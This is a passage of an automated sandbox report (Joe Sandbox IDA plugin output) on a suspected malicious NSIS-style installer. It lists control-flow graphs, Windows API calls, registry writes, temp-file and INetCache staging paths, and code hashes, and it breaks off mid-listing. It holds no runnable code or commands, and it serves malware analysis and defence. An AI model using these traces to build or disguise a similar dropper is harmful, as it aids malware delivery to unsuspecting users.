                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountTick$wsprintf
                                                                                                          • String ID: jA$ jA$... %d%%
                                                                                                          • API String ID: 551687249-2167919867
                                                                                                          • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                          • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                          • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                          • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 755 4025e5-4025fa call 402ba2 758 402600-402607 755->758 759 402a4c-402a4f 755->759 760 402609 758->760 761 40260c-40260f 758->761 762 402a55-402a5b 759->762 760->761 763 402773-40277b 761->763 764 402615-402624 call 405fb5 761->764 763->759 764->763 768 40262a 764->768 769 402630-402634 768->769 770 4026c9-4026cc 769->770 771 40263a-402655 ReadFile 769->771 772 4026e4-4026f4 call 405cad 770->772 773 4026ce-4026d1 770->773 771->763 774 40265b-402660 771->774 772->763 784 4026f6 772->784 773->772 775 4026d3-4026de call 405d0b 773->775 774->763 777 402666-402674 774->777 775->763 775->772 780 40267a-40268c MultiByteToWideChar 777->780 781 40272f-40273b call 405f9c 777->781 780->784 785 40268e-402691 780->785 781->762 788 4026f9-4026fc 784->788 786 402693-40269e 785->786 786->788 789 4026a0-4026c5 SetFilePointer MultiByteToWideChar 786->789 788->781 790 4026fe-402703 788->790 789->786 791 4026c7 789->791 792 402740-402744 790->792 793 402705-40270a 790->793 791->784 794 402761-40276d SetFilePointer 792->794 795 402746-40274a 792->795 793->792 796 40270c-40271f 793->796 794->763 798 402752-40275f 795->798 799 40274c-402750 795->799 796->763 797 402721-402727 796->797 797->769 800 40272d 797->800 798->763 799->794 799->798 800->763
                                                                                                          APIs
                                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                            • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                          • String ID: 9
                                                                                                          • API String ID: 163830602-2366072709
                                                                                                          • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                          • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                          • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                          • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 801 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 808 4023c7-4023cf 801->808 809 402a4c-402a5b 801->809 811 4023d1-4023de call 402bbf lstrlenW 808->811 812 4023e2-4023e5 808->812 811->812 813 4023f5-4023f8 812->813 814 4023e7-4023f4 call 402ba2 812->814 819 402409-40241d RegSetValueExW 813->819 820 4023fa-402404 call 403027 813->820 814->813 823 402422-4024fc RegCloseKey 819->823 824 40241f 819->824 820->819 823->809 826 40281e-402825 823->826 824->823 826->809
                                                                                                          APIs
                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr675C.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsr675C.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsr675C.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsr675C.tmp
                                                                                                          • API String ID: 1356686001-240640546
                                                                                                          • Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                          • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                          • Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                          • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 827 405683-4056ce CreateDirectoryW 828 4056d0-4056d2 827->828 829 4056d4-4056e1 GetLastError 827->829 830 4056fb-4056fd 828->830 829->830 831 4056e3-4056f7 SetFileSecurityW 829->831 831->828 832 4056f9 GetLastError 831->832 832->830
                                                                                                          APIs
                                                                                                          • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                          • GetLastError.KERNEL32 ref: 004056DA
                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                          • GetLastError.KERNEL32 ref: 004056F9
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                          • API String ID: 3449924974-297319885
                                                                                                          • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                          • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                          • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                          • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 833 10001759-10001795 call 10001b18 837 100018a6-100018a8 833->837 838 1000179b-1000179f 833->838 839 100017a1-100017a7 call 10002286 838->839 840 100017a8-100017b5 call 100022d0 838->840 839->840 845 100017e5-100017ec 840->845 846 100017b7-100017bc 840->846 847 1000180c-10001810 845->847 848 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 845->848 849 100017d7-100017da 846->849 850 100017be-100017bf 846->850 854 10001812-1000184c call 100015b4 call 100024a9 847->854 855 1000184e-10001854 call 100024a9 847->855 871 10001855-10001859 848->871 849->845 856 100017dc-100017dd call 10002b5f 849->856 852 100017c1-100017c2 850->852 853 100017c7-100017c8 call 100028a4 850->853 859 100017c4-100017c5 852->859 860 100017cf-100017d5 call 10002645 852->860 866 100017cd 853->866 854->871 855->871 869 100017e2 856->869 859->845 859->853 870 100017e4 860->870 866->869 869->870 870->845 875 10001896-1000189d 871->875 876 1000185b-10001869 call 1000246c 871->876 875->837 881 1000189f-100018a0 GlobalFree 875->881 883 10001881-10001888 876->883 884 1000186b-1000186e 876->884 881->837 883->875 886 1000188a-10001895 call 1000153d 883->886 884->883 885 10001870-10001878 884->885 885->883 887 1000187a-1000187b FreeLibrary 885->887 886->875 887->883
                                                                                                          APIs
                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                            • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2128913504.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2128848115.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2128967473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2129045974.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1791698881-3916222277
                                                                                                          • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                          • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                          • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                          • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 890 405c59-405c65 891 405c66-405c9a GetTickCount GetTempFileNameW 890->891 892 405ca9-405cab 891->892 893 405c9c-405c9e 891->893 895 405ca3-405ca6 892->895 893->891 894 405ca0 893->894 894->895
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                          • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountFileNameTempTick
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                          • API String ID: 1716503409-2113348990
                                                                                                          • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                          • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                          • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                          • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 896 4063bf-4063df GetSystemDirectoryW 897 4063e1 896->897 898 4063e3-4063e5 896->898 897->898 899 4063f6-4063f8 898->899 900 4063e7-4063f0 898->900 902 4063f9-406428 wsprintfW LoadLibraryW 899->902 900->899 901 4063f2-4063f4 900->901 901->902
                                                                                                          APIs
                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                          • wsprintfW.USER32 ref: 00406411
                                                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                          • String ID: %s%S.dll
                                                                                                          • API String ID: 2200240437-2744773210
                                                                                                          • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                          • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                          • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                          • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                          APIs
                                                                                                            • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\14lVOjBoI2.exe"), ref: 00405AC2
                                                                                                            • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                            • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                            • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Unlatticed,?,00000000,000000F0), ref: 00401645
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Unlatticed, xrefs: 00401638
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Unlatticed
                                                                                                          • API String ID: 1892508949-1073148364
                                                                                                          • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                          • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                                                                                          • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                          • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                                                                                          APIs
                                                                                                          • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                            • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                          • String ID:
                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                          • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                          • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                          • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                          • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                            • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,76F923A0), ref: 0040520F
                                                                                                            • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 334405425-0
                                                                                                          • Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                          • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                                                                                                          • Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                          • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000482,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsr675C.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
